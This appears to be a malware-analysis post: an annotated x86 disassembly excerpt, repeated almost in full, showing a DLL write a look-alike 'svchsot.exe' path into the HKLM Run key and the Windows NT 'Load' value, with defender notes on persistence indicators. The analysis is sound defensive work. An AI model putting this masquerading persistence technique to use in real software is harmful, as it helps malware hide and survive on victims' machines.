悟万事之理
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_USERS\S-1-5-21-515967899-162531612-725345543-1003\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load
; Analyst notes: 32-bit x86 debugger dump (address / opcode bytes / mnemonic), stdcall WinAPI calls.
; The excerpt is non-contiguous: 10001FEA-1000202E, then 10002832-10002842, then 10002042-10002052.
; Observed behaviour: build "<SystemDirectory>\svchsot.exe" (name resembles svchost.exe with two
; letters swapped) and write that path as REG_SZ data into registry autostart locations.
; Defender view: writes to HKLM\...\CurrentVersion\Run and to the Windows NT\CurrentVersion\Windows
; "Load" value are the persistence indicators worth alerting on here.
10001FEA 56 push esi
; GetSystemDirectoryA(lpBuffer = eax, uSize = 0x104 /* 260, MAX_PATH */)
10001FEB 68 04010000 push 104
10001FF0 50 push eax
10001FF1 FF15 2CA00010 call dword ptr ds:[<&KERNEL32.GetSystemDirectoryA>]
; kernel32.GetSystemDirectoryA
; ecx = address of a stack buffer; presumably the same buffer passed in eax above - confirm in the full listing
10001FF7 8D4C24 08 lea ecx,dword ptr ss:[esp+8]
; lstrcatA(ecx, "\svchsot.exe") -> buffer now holds "<SystemDirectory>\svchsot.exe"
10001FFB 68 CCC10010 push locarxjh.1000C1CC
; ASCII "\svchsot.exe"
10002000 51 push ecx
10002001 FF15 18A00010 call dword ptr ds:[<&KERNEL32.lstrcatA>]
; kernel32.lstrcatA
; edx = &hKey (stack slot that RegOpenKeyExA fills via phkResult)
10002007 8D5424 04 lea edx,dword ptr ss:[esp+4]
; esi = lstrcatA return value (pointer to the concatenated path); reused as lpData in both RegSetValueExA calls below
1000200B 8BF0 mov esi,eax
; RegOpenKeyExA(hKey = 0x80000002 (HKEY_LOCAL_MACHINE), "Software\Microsoft\Windows\CurrentVersion\Run",
;               ulOptions = 0, samDesired = 0x20006 (= KEY_WRITE), phkResult = edx)
1000200D 52 push edx
1000200E 68 06000200 push 20006
10002013 6A 00 push 0
10002015 68 9CC10010 push locarxjh.1000C19C
; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
1000201A 68 02000080 push 80000002
1000201F FF15 08A00010 call dword ptr ds:[<&ADVAPI32.RegOpenKeyExA>]
; ADVAPI32.RegOpenKeyExA
; eax == 0 (ERROR_SUCCESS) -> jump to 1000203E, i.e. the value write shown at 10002042 (the four bytes
; at 1000203E are not in this dump; likely the load of hKey into ecx). Non-zero (open failed) falls through.
10002025 85C0 test eax,eax
10002027 74 15 je short locarxjh.1000203E
; Failure path: RegCloseKey([esp+4]) - the hKey slot is passed even though the open did not succeed
10002029 8B4424 04 mov eax,dword ptr ss:[esp+4]
1000202D 50 push eax
1000202E FF15 04A00010 call dword ptr ds:[<&ADVAPI32.RegCloseKey>]
; ADVAPI32.RegCloseKey
; --- Different code region (10002832): RegSetValueExA(hKey = ecx, lpValueName = "load", Reserved = 0,
;     dwType = 1 (REG_SZ), lpData = esi (the svchsot.exe path), cbData = 0x104).
;     The RegOpenKeyExA that produced this ecx is not in the excerpt; the "...\Windows NT\CurrentVersion\Windows\Load"
;     paths quoted above the dump are the poster's attribution for it - verify against the full listing.
;     cbData is the whole 0x104-byte buffer length, not strlen+1, so bytes past the NUL are written as well.
10002832 68 04010000 push 104
10002837 56 push esi
10002838 6A 01 push 1
1000283A 6A 00 push 0
1000283C 68 44C20010 push locarxjh.1000C244
; ASCII "load"
10002841 51 push ecx
10002842 FF15 00A00010 call dword ptr ds:[<&ADVAPI32.RegSetValueExA>]
; ADVAPI32.RegSetValueExA
; --- Back at 10002042 (target of the je above): RegSetValueExA(hKey = ecx (the HKLM Run key), lpValueName = "foxwow",
;     Reserved = 0, dwType = 1 (REG_SZ), lpData = esi, cbData = 0x104). Same over-long cbData as above.
10002042 68 04010000 push 104
10002047 56 push esi
10002048 6A 01 push 1
1000204A 6A 00 push 0
1000204C 68 94C10010 push locarxjh.1000C194
; ASCII "foxwow"
10002051 51 push ecx
10002052 FF15 00A00010 call dword ptr ds:[<&ADVAPI32.RegSetValueExA>]
; ADVAPI32.RegSetValueExA
2012年02月22日 16点02分
HKEY_USERS\S-1-5-21-515967899-162531612-725345543-1003\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load
; Analyst notes: 32-bit x86 debugger dump (address / opcode bytes / mnemonic), stdcall WinAPI calls.
; The excerpt is non-contiguous: 10001FEA-1000202E, then 10002832-10002842, then 10002042-10002052.
; Observed behaviour: build "<SystemDirectory>\svchsot.exe" (name resembles svchost.exe with two
; letters swapped) and write that path as REG_SZ data into registry autostart locations.
; Defender view: writes to HKLM\...\CurrentVersion\Run and to the Windows NT\CurrentVersion\Windows
; "Load" value are the persistence indicators worth alerting on here.
10001FEA 56 push esi
; GetSystemDirectoryA(lpBuffer = eax, uSize = 0x104 /* 260, MAX_PATH */)
10001FEB 68 04010000 push 104
10001FF0 50 push eax
10001FF1 FF15 2CA00010 call dword ptr ds:[<&KERNEL32.GetSystemDirectoryA>]
; kernel32.GetSystemDirectoryA
; ecx = address of a stack buffer; presumably the same buffer passed in eax above - confirm in the full listing
10001FF7 8D4C24 08 lea ecx,dword ptr ss:[esp+8]
; lstrcatA(ecx, "\svchsot.exe") -> buffer now holds "<SystemDirectory>\svchsot.exe"
10001FFB 68 CCC10010 push locarxjh.1000C1CC
; ASCII "\svchsot.exe"
10002000 51 push ecx
10002001 FF15 18A00010 call dword ptr ds:[<&KERNEL32.lstrcatA>]
; kernel32.lstrcatA
; edx = &hKey (stack slot that RegOpenKeyExA fills via phkResult)
10002007 8D5424 04 lea edx,dword ptr ss:[esp+4]
; esi = lstrcatA return value (pointer to the concatenated path); reused as lpData in both RegSetValueExA calls below
1000200B 8BF0 mov esi,eax
; RegOpenKeyExA(hKey = 0x80000002 (HKEY_LOCAL_MACHINE), "Software\Microsoft\Windows\CurrentVersion\Run",
;               ulOptions = 0, samDesired = 0x20006 (= KEY_WRITE), phkResult = edx)
1000200D 52 push edx
1000200E 68 06000200 push 20006
10002013 6A 00 push 0
10002015 68 9CC10010 push locarxjh.1000C19C
; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
1000201A 68 02000080 push 80000002
1000201F FF15 08A00010 call dword ptr ds:[<&ADVAPI32.RegOpenKeyExA>]
; ADVAPI32.RegOpenKeyExA
; eax == 0 (ERROR_SUCCESS) -> jump to 1000203E, i.e. the value write shown at 10002042 (the four bytes
; at 1000203E are not in this dump; likely the load of hKey into ecx). Non-zero (open failed) falls through.
10002025 85C0 test eax,eax
10002027 74 15 je short locarxjh.1000203E
; Failure path: RegCloseKey([esp+4]) - the hKey slot is passed even though the open did not succeed
10002029 8B4424 04 mov eax,dword ptr ss:[esp+4]
1000202D 50 push eax
1000202E FF15 04A00010 call dword ptr ds:[<&ADVAPI32.RegCloseKey>]
; ADVAPI32.RegCloseKey
; --- Different code region (10002832): RegSetValueExA(hKey = ecx, lpValueName = "load", Reserved = 0,
;     dwType = 1 (REG_SZ), lpData = esi (the svchsot.exe path), cbData = 0x104).
;     The RegOpenKeyExA that produced this ecx is not in the excerpt; the "...\Windows NT\CurrentVersion\Windows\Load"
;     paths quoted above the dump are the poster's attribution for it - verify against the full listing.
;     cbData is the whole 0x104-byte buffer length, not strlen+1, so bytes past the NUL are written as well.
10002832 68 04010000 push 104
10002837 56 push esi
10002838 6A 01 push 1
1000283A 6A 00 push 0
1000283C 68 44C20010 push locarxjh.1000C244
; ASCII "load"
10002841 51 push ecx
10002842 FF15 00A00010 call dword ptr ds:[<&ADVAPI32.RegSetValueExA>]
; ADVAPI32.RegSetValueExA
; --- Back at 10002042 (target of the je above): RegSetValueExA(hKey = ecx (the HKLM Run key), lpValueName = "foxwow",
;     Reserved = 0, dwType = 1 (REG_SZ), lpData = esi, cbData = 0x104). Same over-long cbData as above.
10002042 68 04010000 push 104
10002047 56 push esi
10002048 6A 01 push 1
1000204A 6A 00 push 0
1000204C 68 94C10010 push locarxjh.1000C194
; ASCII "foxwow"
10002051 51 push ecx
10002052 FF15 00A00010 call dword ptr ds:[<&ADVAPI32.RegSetValueExA>]
; ADVAPI32.RegSetValueExA